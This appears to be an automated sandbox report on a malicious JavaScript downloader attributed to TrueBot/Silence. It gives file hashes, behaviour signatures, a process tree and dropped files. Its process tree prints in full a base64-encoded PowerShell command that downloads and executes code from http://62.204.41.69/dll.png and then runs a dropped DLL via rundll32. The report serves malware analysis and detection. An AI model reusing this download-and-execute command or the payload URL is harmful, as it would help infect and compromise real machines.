Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-04-2023 14:50

General

  • Target

    1/922b1d765a3f88f8b0fb8ee3f71f3023.js

  • Size

    67KB

  • MD5

    922b1d765a3f88f8b0fb8ee3f71f3023

  • SHA1

    4503ab32fe2e77360ea4c4b1882dffe448c68127

  • SHA256

    37906b8349562bfb21048b0c20e26a26c721a649bb64803377de778d81c4036f

  • SHA512

    6c4226a7ffa53a6c90a68b3ec65d2514965e14909e9c8db15865cb23955df699688980e8c4ce8b6ee30ca0327e9e2eec41b63e8e07ad41fa38a38d6eb7c11984

  • SSDEEP

    1536:EMtPc6S1wxBOGKZUXldvp3yZEKs7+QhqWIoCqlO1wKF7x1tNRhn4xVNe/6BPfGMd:i1wxBOGKZUXldvp3yZEKs7+QhqWIoCqJ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.69/dll.png

Signatures

  • TrueBot payload 2 IoCs
  • TrueBot, Silence.Downloader

    A downloader attributed to Silence group first seen in 2017.

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\1\922b1d765a3f88f8b0fb8ee3f71f3023.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4736
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c rundll32 %APPDATA%\NoSleep.dll,ChkdskExs
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2932
          • C:\Windows\system32\rundll32.exe
            rundll32 C:\Users\Admin\AppData\Roaming\NoSleep.dll,ChkdskExs
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1368

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxolmymx.kgr.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\NoSleep.dll

    Filesize

    1.1MB

    MD5

    f52363b6cf282669e5fcc5537b5c3451

    SHA1

    9d9a0b90042fce790ab23191be9cce44c86f13d9

    SHA256

    b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34

    SHA512

    d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49

  • C:\Users\Admin\AppData\Roaming\NoSleep.dll

    Filesize

    1.1MB

    MD5

    f52363b6cf282669e5fcc5537b5c3451

    SHA1

    9d9a0b90042fce790ab23191be9cce44c86f13d9

    SHA256

    b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34

    SHA512

    d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49

  • memory/1488-136-0x000002894C830000-0x000002894C852000-memory.dmp

    Filesize

    136KB

  • memory/1488-146-0x0000028931800000-0x0000028931810000-memory.dmp

    Filesize

    64KB

  • memory/1488-147-0x0000028931800000-0x0000028931810000-memory.dmp

    Filesize

    64KB

  • memory/1488-148-0x0000028931800000-0x0000028931810000-memory.dmp

    Filesize

    64KB

  • memory/1488-152-0x0000028931800000-0x0000028931810000-memory.dmp

    Filesize

    64KB

  • memory/1488-153-0x0000028931800000-0x0000028931810000-memory.dmp

    Filesize

    64KB

  • memory/1488-154-0x0000028931800000-0x0000028931810000-memory.dmp

    Filesize

    64KB